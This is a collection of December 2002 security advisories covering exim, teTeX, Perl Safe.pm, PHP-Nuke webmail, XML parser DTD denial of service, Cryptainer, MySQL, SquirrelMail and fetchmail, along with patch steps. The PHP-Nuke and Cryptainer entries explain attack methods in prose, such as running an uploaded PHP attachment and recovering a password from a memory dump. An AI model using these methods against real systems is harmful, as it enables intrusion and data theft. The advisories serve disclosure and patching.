-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT 200212-5 - - PACKAGE : exim SUMMARY : local root vulnerability DATE : 2002-12-16 16:12 UTC EXPLOIT : local - - - From advisory: "This is a format string bug in daemon.c, line 976: sprintf(CS buff, CS pid_file_path, ""); /* Backward compatibility */ pid_file_path can be changed on the command line. This line is in the function daemon_go(), which only gets executed when the user is an exim-admin-user." Read the full advisory at http://marc.theaimsgroup.com/?l=bugtraq&m=103903403527788&w=2 SOLUTION It is recommended that all Gentoo Linux users who are running net-mail/exim-4.05 and earlier update their systems as follows: emerge rsync emerge exim emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz [EMAIL PROTECTED] - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE9/gBNfT7nyhUpoZMRAq43AKCfp65F8XNHS5Td8CE1qQiNqvrT9QCeJUTB 6MYY1rust/c7RtKpA78PAv4= =IZpj -END PGP SIGNATURE-
[OpenPKG-SA-2002.015] OpenPKG Security Advisory (tetex)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security.html http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2002.015 16-Dec-2002 Package: tetex Vulnerability: remote command execution OpenPKG Specific:no Dependent Packages: none Affected Releases: Affected Packages: Corrected Packages: OpenPKG 1.0 <= tetex-1.0.7-1.0.0 >= tetex-1.0.7-1.0.1 OpenPKG 1.1 <= tetex-1.0.7-1.1.0 >= tetex-1.0.7-1.1.1 OpenPKG CURRENT <= tetex-1.0.7-20021204 >= tetex-1.0.7-20021216 Description: A vulnerability [1] in the kpathsea(3) library of teTeX was discovered. This library is used by xdvi(1) and dvips(1). Both programs call the system(3) function insecurely, which allows a remote attacker to execute arbitrary commands via cleverly crafted DVI files. If dvips(1) is used in a print filter, this allows a local or remote attacker with print permission execute arbitrary code as the printing system user. Check whether you are affected by running "/bin/rpm -q tetex". If you have an affected version of the samba package (see above), please upgrade it according to the solution below. Solution: Update existing packages to newly patched versions of teTeX. Select the updated source RPM appropriate for your OpenPKG release [2][3][4], and fetch it from the OpenPKG FTP service or a mirror location. Verify its integrity [5], build a corresponding binary RPM from it and update your OpenPKG installation by applying the binary RPM [6]. For the latest OpenPKG 1.1 release, perform the following operations to permanently fix the security problem (for other releases adjust accordingly). $ ftp ftp.openpkg.org ftp> bin ftp> cd release/1.1/UPD ftp> get tetex-1.0.7-1.1.1.src.rpm ftp> bye $ /bin/rpm -v --checksig tetex-1.0.7-1.1.1.src.rpm $ /bin/rpm --rebuild tetex-1.0.7-1.1.1.src.rpm $ su - # /bin/rpm -Fvh /RPM/PKG/tetex-1.0.7-1.1.1.*.rpm References: [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0836 [2] ftp://ftp.openpkg.org/release/1.0/UPD/ [3] ftp://ftp.openpkg.org/release/1.1/UPD/ [4] ftp://ftp.openpkg.org/current/SRC/ [5] http://www.openpkg.org/security.html#signature [6] http://www.openpkg.org/tutorial.html#regular-source For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can find under the official URL http://www.openpkg.org/openpkg.pgp or on http://keyserver.pgp.com/. To check the integrity of this advisory, verify its digital signature by using GnuPG (http://www.gnupg.org/). For example, pipe this message to the command "gpg --verify --keyserver keyserver.pgp.com". -BEGIN PGP SIGNATURE- Comment: OpenPKG <[EMAIL PROTECTED]> iEYEARECAAYFAj3+AOwACgkQgHWT4GPEy59EaQCg3nIl3ru+vU27i/Wcqm+cUH5N /tAAn0QY3lN4bmUtNXIwMGsGitW2LMsz =6F8t -END PGP SIGNATURE-
PHP-Nuke code execution and XSS vulnerabilities
PHP-Nuke code execution and XSS vulnerabilities PROGRAM: PHP-Nuke VENDOR: Fransisco Burzi et al. HOMEPAGE: http://phpnuke.org/ VULNERABLE VERSIONS: 6.0 (the only supported version) IMMUNE VERSIONS: 6.0 with my patch applied LOGIN REQUIRED: no DESCRIPTION: "PHP-Nuke is a Web portal and online community system which includes Web-based administration, surveys, access statistics, user customizable boxes, a themes manager for registered users, friendly administration GUI with graphic topic manager, the ability to edit or delete stories, an option to delete comments, a moderation system, referer tracking, integrated banner ad system, search engine, backend/headlines generation (RSS/RDF format), Web directory like Yahoo, events manager, and support for 20+ languages." (direct quote from the program's project page at Freshmeat) PHP-Nuke is published under the terms of the GNU General Public License. It is a very popular program with lots and lots of installations. It is included as one of the packages in Debian GNU/Linux and one of FreeBSD's ports. Despite all this, the program has a bad reputation regarding security matters. SUMMARY: PHP-Nuke has a module that implements a web mail system. When a user reads an e-mail message with an attached file, the file in question is stored in a web accessible directory under its normal file name. Files with active web content, such as CGI or PHP scripts, are handled the same way. The module also has a cross-site scripting hole. Either problem is serious in its own right, but when we combine them, we end up with something very serious: an e-mail message that automatically executes an attached PHP script when someone opens it! TECHNICAL DETAILS: As stated above, PHP-Nuke has got a web mail system, and it stores attachments under their real file names in a directory where anyone can surf to them. There is nothing in the code that stops active content, such as PHP scripts, from being stored in that directory. There is also no warning against this in the program's documentation. As a result, any attacker can execute any PHP script on the web server. The attacker first sends the script as an attachment to any user who will read that message in PHP-Nuke's web mail system. The attacker then waits for the user to open the message, and finally the attacker just surfs to a predictable WWW location. The user doesn't even have to open the attachment, just the mail that it comes in. As a bonus, the web mail system also has a Cross-Site Scripting vulnerability. It doesn't remove
[OpenPKG-SA-2002.014] OpenPKG Security Advisory (perl)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security.html http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2002.014 16-Dec-2002 Package: perl Vulnerability: unsafe Safe compartment OpenPKG Specific:no Dependent Packages: none Affected Releases: Affected Packages: Corrected Packages: OpenPKG 1.0 <= perl-5.6.1-1.0.1 >= perl-5.6.1-1.0.2 OpenPKG 1.1 <= perl-5.6.1-1.1.0 >= perl-5.6.1-1.1.1 OpenPKG CURRENT <= perl-5.8.0-20021129 >= perl-5.8.0-20021216 Description: Andreas Jurenda discovered [0] a security hole in Safe.pm for Perl [1]. When a Safe compartment has already been used, there's no guarantee that it's safe any longer, because there's a way for code executed within the Safe compartment to alter its operation mask. Programs that use a Safe compartment only once aren't affected by this bug. Check whether you are affected by running "/bin/rpm -q perl". If you have an affected version of the Perl package (see above), please upgrade it according to the solution below. Solution: Update existing packages to newly patched versions of Perl. Select the updated source RPM appropriate for your OpenPKG release [2][3][4], and fetch it from the OpenPKG FTP service or a mirror location. Verify its integrity [5], build a corresponding binary RPM from it and update your OpenPKG installation by applying the binary RPM [6]. For the latest OpenPKG 1.1 release, perform the following operations to permanently fix the security problem (for other releases adjust accordingly). $ ftp ftp.openpkg.org ftp> bin ftp> cd release/1.1/UPD ftp> get perl-5.6.1-1.1.1.src.rpm ftp> bye $ /bin/rpm -v --checksig perl-5.6.1-1.1.1.src.rpm $ /bin/rpm --rebuild perl-5.6.1-1.1.1.src.rpm $ su - # /bin/rpm -Fvh /RPM/PKG/perl-5.6.1-1.1.1.*.rpm References: [0] http://bugs6.perl.org/rt2/Ticket/Display.html?user=guest&pass=guest&id=17744 [1] http://www.perl.com/ [2] ftp://ftp.openpkg.org/release/1.0/UPD/ [3] ftp://ftp.openpkg.org/release/1.1/UPD/ [4] ftp://ftp.openpkg.org/current/SRC/ [5] http://www.openpkg.org/security.html#signature [6] http://www.openpkg.org/tutorial.html#regular-source For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can find under the official URL http://www.openpkg.org/openpkg.pgp or on http://keyserver.pgp.com/. To check the integrity of this advisory, verify its digital signature by using GnuPG (http://www.gnupg.org/). For example, pipe this message to the command "gpg --verify --keyserver keyserver.pgp.com". -BEGIN PGP SIGNATURE- Comment: OpenPKG <[EMAIL PROTECTED]> iEYEARECAAYFAj3+AJgACgkQgHWT4GPEy58V+gCg7izWdygkK12AbXPpY2izzuWb wA4AoMG3rg9EUfy1fkimlOl5zxoAsLho =ZxAt -END PGP SIGNATURE-
Multiple vendors XML parser (and SOAP/WebServices server) Denialof Service attack using DTD
/// >> Security Advisory << /// Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/ => Release date: 16/Dec/2002 => Vendor: Multiple vendors The following products were found to be vulnerable: - The Expat Developers Expat XML parser - Apache Group Xerces XML parser - IBM WebSphere - Sun Microsystems SunONE - Apache Group Apache Axis - Macromedia ColdFusion/MX (Professional, Enterprise, J2EE Editions released through October, 2002) - Macromedia JRun 4.0 - Sybase EAServer v4.1, v4.1.1, v4.1.2, v4.1.3 - BEA WebLogic Integration 2.1, 7.0 - BEA WebLogic Server/Express 6.0, 6.1, 7.0, 7.0.0.1 - HP (undisclosed list of products) - Other products from other vendors are known to be vulnerable too Where not explicitly stated, the versions affected are the latest ones (as of October 2002). All vendors mentioned were informed, directly or indirectly, by November 25th. => Severity: High => CVE candidate: Not assigned yet. => BugTraq ID assigned: 6363 (Macromedia products), 6378 (BEA products) => Summary: Using the DTD part of the XML document, it is possible to cause the XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in a denial of service condition. => Solution/Vendor response: Macromedia ColdFusion/MX: Macromedia has issued a bulletin regarding this problem, and links to product patches can be found therein: http://www.macromedia.com/v1/handlers/index.cfm?ID=23559 Macromedia JRun: Macromedia has issued a bulletin regarding this problem, and links to product patches can be found therein: http://www.macromedia.com/v1/handlers/index.cfm?ID=23559 Sybase EAServer: Sybase has issued a bulletin regarding this problem, and links to product patches can be found therein: http://my.sybase.com/detail?id=1022856 BEA WebLogic Integration: BEA has issued a bulletin regarding this problem, and links to product patches can be found therein: http://dev2dev.bea.com/resourcelibrary/advisoriesdetail.jsp?highlight=advisoriesnotifications&path=components%2Fdev2dev%2Fresourcelibrary%2Fadvisoriesnotifications%2FBEA02-23.htm BEA WebLogic Server/Express: BEA has issued a bulletin regarding this problem, and links to product patches can be found therein: http://dev2dev.bea.com/resourcelibrary/advisoriesdetail.jsp?highlight=advisoriesnotifications&path=components%2Fdev2dev%2Fresourcelibrary%2Fadvisoriesnotifications%2FBEA02-23.htm HP Products: HP requested that the following text would appear in this advisory: - SOURCE: Hewlett-Packard Company Software Security Response Team HP SSRT case # SSRT2426 At the time of writing this document, HP is currently investigating the potential impact to HP's released Operating System software products. As further information becomes available HP will provide notice of the availability of any necessary patches through standard security bulletin announcements and be available from your normal HP Services support channel. - => Workaround: If possible, disable DTD in the XML parser. This requires raw access to the XML parser API, which is usually impossible for Web Services applications. => Acknowledgements - Ory Segal from Sanctum, for his help in developing a generic exploit. - Tom Donovan and Stephen Dupre from Macromedia (and the rest of the Macromedia team) for their promptness and help with the interaction with other vendors.
Password Disclosure in Cryptainer
=== Advisory: Password Disclosure in Cryptainer Vendor: SecureSoft http://www.cypherix.com Download Location: http://www.cypherix.com/downloads.htm Versions affected: Cryptainer PE and Cryptainer 2.0 Date: 16th December 2002 Type of Vulnerability: Information Disclosure in Memory of Process Severity: Medium Discovered by: K. K. Mookhey ([EMAIL PROTECTED]) Network Intelligence India Pvt. Ltd. (http://www.nii.co.in) Online location: http://www.nii.co.in/vuln/crypt.html === Background: = >From vendor website: "Cryptainer PE's ease of use together with its powerful 448 bit strong encryption provides file security without changing the way you work. It creates a 100MB encrypted drive that can be loaded and unloaded as required. It combines ease of use and simple drag-and-drop operations with powerful 448 bit strong encryption ensuring total security with phenomenal ease of use and maximum convenience!" Both products use the Blowfish algorithm. Description: = Both the versions of Cryptainer store the password in clear text in the memory of the process without encrypting it or nullifying it. This password is clearly visible as long as the following two conditions are satisfied: 1. The user has entered the password at least once 2. Cryptainer is loaded The encrypted volume may or may not be loaded. Since this product comes with an option to minimize to the System Tray, it is quite likely that the user would keep Cryptainer running without loading the encrypted volume containing the encrypted files. In such a case, a user might assume that since the encrypted volume is not loaded, his files are safe. But an intruder who is able to dump the memory of the running process can ferret out the password with relative ease. Besides the password, the physical path of the volume is also clearly visible. Also Cryptainer does not provide a limit to the number of wrong password attempts. So an intruder must collect the memory dump, and copy the physical location of the logical volume (which is actually one big file) onto his machine, and then run Cryptainer and check all the strings in the memory dump for the correct password. References: = A similar vulnerability was found in Password Safe written by crypto-guru Bruce Schneier. This was acknowledged by him and addressed by the developer of the open source version of this product. Bruce Schneier's response is here: http://www.counterpane.com/crypto-gram-0111.html#6 Impact: = First of all, the intruder would need to have physical access to the PC in order to gather a physical dump. Moreover, it would be necessary to have Cryptainer running - either with the encrypted volume loaded or unloaded. This however is not so uncommon. On the other hand, it is in the event of a physical intrusion, that one would need the encryption software to protect one's data. Therefore, the physical access event must be assumed as having occured. Then, the estimated probability of a compromise must be that of Cryptainer running in the System Tray, and the user having used the software at least once. Vendor Response: = The vendor response is somehow not so clear. We have corresponded with them repeatedly since November 23rd. The essence that we have been able to make out is that they will probably look into it in their next release sometime in the first quarter of 2003. Their contention is also that with the kind of physical access required for this to work, the intruder might as well install a keylogger. Workaround: == Do not keep Cryptainer minimized in the System Tray even if you have unloaded the encrypted volume. Exit the software as soon as you have finished encrypting/decrypting the files, by clicking on the Shutdown and Exit button. Note: The software is still pretty secure, and if you do not keep Cryptainer in the System Tray you should be safe. K. K. Mookhey CTO, Network Intelligence India Pvt. Ltd. Tel: 91-22-22001530, 22006019 Email: [EMAIL PROTECTED] Web: www.nii.co.in = The Unix Auditor's Practical Handbook http://www.nii.co.in/tuaph.html =
GLSA: mysql
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT 200212-2.1 - - PACKAGE : mysql SUMMARY : remote DOS and arbitrary code execution DATE : 2002-12-15 12:12 UTC EXPLOIT : remote - - The original advisory sent by me contained a typo (net-misc/freeswan should have been dev-db/mysql). This re-issue has the correct text. - From e-matters advisory: "We have discovered two flaws within the MySQL server that can be used by any MySQL user to crash the server. Furthermore one of the flaws can be used to bypass the MySQL password check or to execute arbitrary code with the privileges of the user running mysqld. We have also discovered an arbitrary size heap overflow within the mysql client library and another vulnerability that allows to write '\0' to any memory address. Both flaws could allow DOS attacks against or arbitrary code execution within anything linked against libmysqlclient." Read the full advisory at http://security.e-matters.de/advisories/042002.html SOLUTION It is recommended that all Gentoo Linux users who are running dev-db/mysql-3.23.53 and earlier update their systems as follows: emerge rsync emerge mysql emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz [EMAIL PROTECTED] - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE9/JgefT7nyhUpoZMRApRsAJ95aYUx7n0WEjXnBZlY8Zn7pYaLGwCfdGid /yJgKoxAcgQMpT08CzM/tgI= =kWbX -END PGP SIGNATURE-
GLSA: squirrelmail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT 200212-4 - - PACKAGE : squirrelmail SUMMARY : cross site scripting DATE : 2002-12-15 14:12 UTC EXPLOIT : remote - - euronymous <[EMAIL PROTECTED]> found that read_body.php didn't filter out user input for 'filter_dir' and 'mailbox', making a xss attack possible. Read the full advisory at http://f0kp.iplus.ru/bz/008.txt SOLUTION It is recommended that all Gentoo Linux users who are running net-mail/squirrelmail-1.2.9 and earlier update their systems as follows: emerge rsync emerge squirrelmail emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE9/JPrfT7nyhUpoZMRAuUKAJ98w49ZxG/AzqPtINkcLHt83S568wCfeq+N X8vYK73anWOOTITkoBwMRsY= =5d7Y -END PGP SIGNATURE-
GLSA: fetchmail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT 200212-3 - - PACKAGE : fetchmail SUMMARY : buffer overflow DATE : 2002-12-15 13:12 UTC EXPLOIT : remote - - - From e-matters advisory: "In the light of recent discoveries we reaudited Fetchmail and found another bufferoverflow within the default configuration. This heap overflow can be used by remote attackers to crash it or to execute arbitrary code with the privileges of the user running fetchmail. Depending on the configuration this allows a remote root compromise." Read the full advisory at http://security.e-matters.de/advisories/052002.html SOLUTION It is recommended that all Gentoo Linux users who are running net-mail/fetchmail-6.1.2 and earlier update their systems as follows: emerge rsync emerge fetchmail emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz [EMAIL PROTECTED] - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE9/H6GfT7nyhUpoZMRAsaYAJ91S9qnCMg7K52RKryLUMuWi0URIACgpFdF AUF2cEn+Y8qLPsolPSSIf0s= =nDtt -END PGP SIGNATURE-
GLSA: mysql
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT 200212-2 - - PACKAGE : mysql SUMMARY : remote DOS and arbitrary code execution DATE : 2002-12-15 12:12 UTC EXPLOIT : remote - - - From e-matters advisory: "We have discovered two flaws within the MySQL server that can be used by any MySQL user to crash the server. Furthermore one of the flaws can be used to bypass the MySQL password check or to execute arbitrary code with the privileges of the user running mysqld. We have also discovered an arbitrary size heap overflow within the mysql client library and another vulnerability that allows to write '\0' to any memory address. Both flaws could allow DOS attacks against or arbitrary code execution within anything linked against libmysqlclient." Read the full advisory at http://security.e-matters.de/advisories/042002.html SOLUTION It is recommended that all Gentoo Linux users who are running net-misc/freeswan-3.23.53 and earlier update their systems as follows: emerge rsync emerge mysql emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz [EMAIL PROTECTED] - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE9/HS4fT7nyhUpoZMRAh7MAKDDjsF3TdzsFWQ7ZlSgkuQCWyhxjACgifSG xISOZG8+mGVv1S6BQCs4+I8= =AA47 -END PGP SIGNATURE-
